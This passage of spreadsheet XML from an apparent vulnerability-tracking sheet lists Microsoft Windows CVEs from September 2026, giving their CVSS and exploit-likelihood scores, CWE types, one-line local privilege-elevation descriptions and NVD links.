s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S906" s="5" t="inlineStr"><is><t>Double free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T906" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69292</t></is></c></row><row r="907"><c r="A907" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B907" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C907" s="5" t="inlineStr"><is><t>CVE-2026-69299</t></is></c><c r="D907" s="5" t="n"><v>7</v></c><c r="E907" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F907" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G907" s="5" t="inlineStr" /><c r="H907" s="5" t="n"><v>0.002</v></c><c r="I907" s="5" t="inlineStr" /><c r="J907" s="5" t="inlineStr" /><c r="K907" s="5" t="inlineStr" /><c r="L907" s="5" t="inlineStr" /><c r="M907" s="5" t="inlineStr" /><c r="N907" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O907" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P907" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q907" s="5" t="inlineStr" /><c r="R907" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S907" s="5" t="inlineStr"><is><t>Use after free in Microsoft COM for Windows allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T907" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69299</t></is></c></row><row r="908"><c r="A908" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B908" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C908" s="5" t="inlineStr"><is><t>CVE-2026-69300</t></is></c><c r="D908" s="5" t="n"><v>7</v></c><c r="E908" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F908" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G908" s="5" t="inlineStr" /><c r="H908" s="5" t="n"><v>0.002</v></c><c r="I908" s="5" t="inlineStr" /><c r="J908" s="5" t="inlineStr" /><c r="K908" s="5" t="inlineStr" /><c r="L908" s="5" t="inlineStr" /><c r="M908" s="5" t="inlineStr" /><c r="N908" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O908" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P908" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q908" s="5" t="inlineStr" /><c r="R908" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S908" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T908" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69300</t></is></c></row><row r="909"><c r="A909" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B909" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C909" s="5" t="inlineStr"><is><t>CVE-2026-69309</t></is></c><c r="D909" s="5" t="n"><v>7</v></c><c r="E909" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F909" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G909" s="5" t="inlineStr" /><c r="H909" s="5" t="n"><v>0.003</v></c><c r="I909" s="5" t="inlineStr" /><c r="J909" s="5" t="inlineStr" /><c r="K909" s="5" t="inlineStr" /><c r="L909" s="5" t="inlineStr" /><c r="M909" s="5" t="inlineStr" /><c r="N909" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O909" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P909" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q909" s="5" t="inlineStr" /><c r="R909" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S909" s="5" t="inlineStr"><is><t>Double free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T909" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69309</t></is></c></row><row r="910"><c r="A910" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B910" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C910" s="5" t="inlineStr"><is><t>CVE-2026-69310</t></is></c><c r="D910" s="5" t="n"><v>7</v></c><c r="E910" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F910" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G910" s="5" t="inlineStr" /><c r="H910" s="5" t="n"><v>0.003</v></c><c r="I910" s="5" t="inlineStr" /><c r="J910" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K91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10" s="5" t="inlineStr" /><c r="M910" s="5" t="inlineStr" /><c r="N910" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O910" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P910" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q910" s="5" t="inlineStr" /><c r="R910" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S910" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T910" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69310</t></is></c></row><row r="911"><c r="A911" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B911" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C911" s="5" t="inlineStr"><is><t>CVE-2026-69311</t></is></c><c r="D911" s="5" t="n"><v>7</v></c><c r="E911" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F911" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G911" s="5" t="inlineStr" /><c r="H911" s="5" t="n"><v>0.003</v></c><c r="I911" s="5" t="inlineStr" /><c r="J911" s="5" t="inlineStr" /><c r="K911" s="5" t="inlineStr" /><c r="L911" s="5" t="inlineStr" /><c r="M911" s="5" t="inlineStr" /><c r="N911" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O911" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P911" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q911" s="5" t="inlineStr" /><c r="R911" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S911" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T911" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69311</t></is></c></row><row r="912"><c r="A912" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B912" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C912" s="5" t="inlineStr"><is><t>CVE-2026-69319</t></is></c><c r="D912" s="5" t="n"><v>7</v></c><c r="E912" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F912" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G912" s="5" t="inlineStr" /><c r="H912" s="5" t="n"><v>0.002</v></c><c r="I912" s="5" t="inlineStr" /><c r="J912" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K91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12" s="5" t="inlineStr" /><c r="M912" s="5" t="inlineStr" /><c r="N912" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O912" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P912" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q912" s="5" t="inlineStr" /><c r="R912" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S912" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T912" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t></is></c></row><row r="913"><c r="A913" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B913" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C913" s="5" t="inlineStr"><is><t>CVE-2026-69331</t></is></c><c r="D913" s="5" t="n"><v>7</v></c><c r="E913" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F913" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G913" s="5" t="inlineStr" /><c r="H913" s="5" t="n"><v>0.002</v></c><c r="I913" s="5" t="inlineStr" /><c r="J913" s="5" t="inlineStr" /><c r="K913" s="5" t="inlineStr" /><c r="L913" s="5" t="inlineStr" /><c r="M913" s="5" t="inlineStr" /><c r="N913" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O913" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P913" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q913" s="5" t="inlineStr" /><c r="R913" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S913" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T913" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69331</t></is></c></row><row r="914"><c r="A914" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B914" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C914" s="5" t="inlineStr"><is><t>CVE-2026-69333</t></is></c><c r="D914" s="5" t="n"><v>7</v></c><c r="E914" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F914" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G914" s="5" t="inlineStr" /><c r="H914" s="5" t="n"><v>0.003</v></c><c r="I914" s="5" t="inlineStr" /><c r="J914" s="5" t="inlineStr" /><c r="K914" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L914" s="5" t="inlineStr" /><c r="M914" s="5" t="inlineStr" /><c r="N914" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O914" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P914" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q914" s="5" t="inlineStr" /><c r="R914" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S914" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T914" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69333</t></is></c></row><row r="915"><c r="A915" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B915" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C915" s="5" t="inlineStr"><is><t>CVE-2026-69335</t></is></c><c r="D915" s="5" t="n"><v>7</v></c><c r="E915" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F915" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G915" s="5" t="inlineStr" /><c r="H915" s="5" t="n"><v>0.003</v></c><c r="I915" s="5" t="inlineStr" /><c r="J915" s="5" t="inlineStr" /><c r="K915" s="5" t="inlineStr" /><c r="L915" s="5" t="inlineStr" /><c r="M915" s="5" t="inlineStr" /><c r="N915" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O915" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P915" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q915" s="5" t="inlineStr" /><c r="R915" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S915" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T915" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69335</t></is></c></row><row r="916"><c r="A916" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B916" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C916" s="5" t="inlineStr"><is><t>CVE-2026-69341</t></is></c><c r="D916" s="5" t="n"><v>7</v></c><c r="E916" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F916" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G916" s="5" t="inlineStr" /><c r="H916" s="5" t="n"><v>0.003</v></c><c r="I916" s="5" t="inlineStr" /><c r="J916" s="5" t="inlineStr" /><c r="K916" s="5" t="inlineStr" /><c r="L916" s="5" t="inlineStr" /><c r="M916" s="5" t="inlineStr" /><c r="N916" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O916" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P916" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q916" s="5" t="inlineStr" /><c r="R916" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S916" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T916" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69341</t></is></c></row><row r="917"><c r="A917" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B917" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C917" s="5" t="inlineStr"><is><t>CVE-2026-69362</t></is></c><c r="D917" s="5" t="n"><v>7</v></c><c r="E917" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F917" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G917" s="5" t="inlineStr" /><c r="H917" s="5" t="n"><v>0.003</v></c><c r="I917" s="5" t="inlineStr" /><c r="J917" s="5" t="inlineStr" /><c r="K917" s="5" t="inlineStr" /><c r="L917" s="5" t="inlineStr" /><c r="M917" s="5" t="inlineStr" /><c r="N917" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O917" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P917" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q917" s="5" t="inlineStr" /><c r="R917" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S917" s="5" t="inlineStr"><is><t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T917" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69362</t></is></c></row><row r="918"><c r="A918" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B918" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C918" s="5" t="inlineStr"><is><t>CVE-2026-69379</t></is></c><c r="D918" s="5" t="n"><v>7</v></c><c r="E918" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F918" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G918" s="5" t="inlineStr" /><c r="H918" s="5" t="n"><v>0.003</v></c><c r="I918" s="5" t="inlineStr" /><c r="J918" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K918" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L918" s="5" t="inlineStr" /><c r="M918" s="5" t="inlineStr" /><c r="N918" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O918" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P918" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q918" s="5" t="inlineStr" /><c r="R918" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S918" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T918" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69379</t></is></c></row><row r="919"><c r="A919" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B919" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C919" s="5" t="inlineStr"><is><t>CVE-2026-69383</t></is></c><c r="D919" s="5" t="n"><v>7</v></c><c r="E919" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F919" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G919" s="5" t="inlineStr" /><c r="H919" s="5" t="n"><v>0.002</v></c><c r="I919" s="5" t="inlineStr" /><c r="J919" s="5" t="inlineStr" /><c r="K919" s="5" t="inlineStr" /><c r="L919" s="5" t="inlineStr" /><c r="M919" s="5" t="inlineStr" /><c r="N919" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O919" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P919" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q919" s="5" t="inlineStr" /><c r="R919" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S919" s="5" t="inlineStr"><is><t>External control of file name or path in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T919" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69383</t></is></c></row><row r="920"><c r="A920" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B920" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C920" s="5" t="inlineStr"><is><t>CVE-2026-69385</t></is></c><c r="D920" s="5" t="n"><v>7</v></c><c r="E920" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F920" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G920" s="5" t="inlineStr" /><c r="H920" s="5" t="n"><v>0.002</v></c><c r="I920" s="5" t="inlineStr" /><c r="J920" s="5" t="inlineStr" /><c r="K920" s="5" t="inlineStr" /><c r="L920" s="5" t="inlineStr" /><c r="M920" s="5" t="inlineStr" /><c r="N920" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O920" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P920" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q920" s="5" t="inlineStr" /><c r="R920" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S920" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T920" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69385</t></is></c></row><row r="921"><c r="A921" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B921" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C921" s="5" t="inlineStr"><is><t>CVE-2026-69388</t></is></c><c r="D921" s="5" t="n"><v>7</v></c><c r="E921" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F921" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G921" s="5" t="inlineStr" /><c r="H921" s="5" t="n"><v>0.003</v></c><c r="I921" s="5" t="inlineStr" /><c r="J921" s="5" t="inlineStr" /><c r="K921" s="5" t="inlineStr" /><c r="L921" s="5" t="inlineStr" /><c r="M921" s="5" t="inlineStr" /><c r="N921" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O921" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P921" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q921" s="5" t="inlineStr" /><c r="R921" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S921" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T921" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69388</t></is></c></row><row r="922"><c r="A922" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B922" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C922" s="5" t="inlineStr"><is><t>CVE-2026-69394</t></is></c><c r="D922" s="5" t="n"><v>7</v></c><c r="E922" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F922" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G922" s="5" t="inlineStr" /><c r="H922" s="5" t="n"><v>0.003</v></c><c r="I922" s="5" t="inlineStr" /><c r="J922" s="5" t="inlineStr" /><c r="K922" s="5" t="inlineStr" /><c r="L922" s="5" t="inlineStr" /><c r="M922" s="5" t="inlineStr" /><c r="N922" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O922" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P922" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q922" s="5" t="inlineStr" /><c r="R922" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S922" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T922" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69394</t></is></c></row><row r="923"><c r="A923" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B923" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C923" s="5" t="inlineStr"><is><t>CVE-2026-69398</t></is></c><c r="D923" s="5" t="n"><v>7</v></c><c r="E923" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F923" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G923" s="5" t="inlineStr" /><c r="H923" s="5" t="n"><v>0.002</v></c><c r="I923" s="5" t="inlineStr" /><c r="J923" s="5" t="inlineStr" /><c r="K923" s="5" t="inlineStr" /><c r="L923" s="5" t="inlineStr" /><c r="M923" s="5" t="inlineStr" /><c r="N923" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O923" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P923" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q923" s="5" t="inlineStr" /><c r="R923" s="5" t="inlineStr"><is><t>CWE-362, CWE-415</t></is></c><c r="S923" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T923" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69398</t></is></c></row><row r="924"><c r="A924" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B924" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C924" s="5" t="inlineStr"><is><t>CVE-2026-69401</t></is></c><c r="D924" s="5" t="n"><v>7</v></c><c r="E924" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F924" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G924" s="5" t="inlineStr" /><c r="H924" s="5" t="n"><v>0.002</v></c><c r="I924" s="5" t="inlineStr" /><c r="J924" s="5" t="inlineStr" /><c r="K924" s="5" t="inlineStr" /><c r="L924" s="5" t="inlineStr" /><c r="M924" s="5" t="inlineStr" /><c r="N924" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O924" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P924" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q924" s="5" t="inlineStr" /><c r="R924" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S924" s="5" t="inlineStr"><is><t>Use after free in Audio Video Control Transport Protocol allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T924" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69401</t></is></c></row><row r="925"><c r="A925" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B925" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C925" s="5" t="inlineStr"><is><t>CVE-2026-69404</t></is></c><c r="D925" s="5" t="n"><v>7</v></c><c r="E925" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F925" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G925" s="5" t="inlineStr" /><c r="H925" s="5" t="n"><v>0.002</v></c><c r="I925" s="5" t="inlineStr" /><c r="J925" s="5" t="inlineStr" /><c r="K925" s="5" t="inlineStr" /><c r="L925" s="5" t="inlineStr" /><c r="M925" s="5" t="inlineStr" /><c r="N925" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O925" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P925" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q925" s="5" t="inlineStr" /><c r="R925" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S925" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T925" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69404</t></is></c></row><row r="926"><c r="A926" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B926" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C926" s="5" t="inlineStr"><is><t>CVE-2026-69410</t></is></c><c r="D926" s="5" t="n"><v>7</v></c><c r="E926" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F926" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G926" s="5" t="inlineStr" /><c r="H926" s="5" t="n"><v>0.003</v></c><c r="I926" s="5" t="inlineStr" /><c r="J926" s="5" t="inlineStr" /><c r="K926" s="5" t="inlineStr" /><c r="L926" s="5" t="inlineStr" /><c r="M926" s="5" t="inlineStr" /><c r="N926" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O926" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P926" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q926" s="5" t="inlineStr" /><c r="R926" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S926" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T926" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69410</t></is></c></row><row r="927"><c r="A927" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B927" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C927" s="5" t="inlineStr"><is><t>CVE-2026-69413</t></is></c><c r="D927" s="5" t="n"><v>7</v></c><c r="E927" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F927" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G927" s="5" t="inlineStr" /><c r="H927" s="5" t="n"><v>0.003</v></c><c r="I927" s="5" t="inlineStr" /><c r="J927" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K92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27" s="5" t="inlineStr" /><c r="M927" s="5" t="inlineStr" /><c r="N927" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O927" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P927" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q927" s="5" t="inlineStr" /><c r="R927" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S927" s="5" t="inlineStr"><is><t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T927" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t></is></c></row><row r="928"><c r="A928" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B928" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C928" s="5" t="inlineStr"><is><t>CVE-2026-69422</t></is></c><c r="D928" s="5" t="n"><v>7</v></c><c r="E928" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F928" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G928" s="5" t="inlineStr" /><c r="H928" s="5" t="n"><v>0.003</v></c><c r="I928" s="5" t="inlineStr" /><c r="J928" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K928" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L928" s="5" t="inlineStr" /><c r="M928" s="5" t="inlineStr" /><c r="N928" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O928" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P928" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q928" s="5" t="inlineStr" /><c r="R928" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S928" s="5" t="inlineStr"><is><t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T928" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t></is></c></row><row r="929"><c r="A929" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B929" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C929" s="5" t="inlineStr"><is><t>CVE-2026-69430</t></is></c><c r="D929" s="5" t="n"><v>7</v></c><c r="E929" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F929" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G929" s="5" t="inlineStr" /><c r="H929" s="5" t="n"><v>0.003</v></c><c r="I929" s="5" t="inlineStr" /><c r="J929" s="5" t="inlineStr" /><c r="K929" s="5" t="inlineStr" /><c r="L929" s="5" t="inlineStr" /><c r="M929" s="5" t="inlineStr" /><c r="N929" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O929" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P929" s="5" 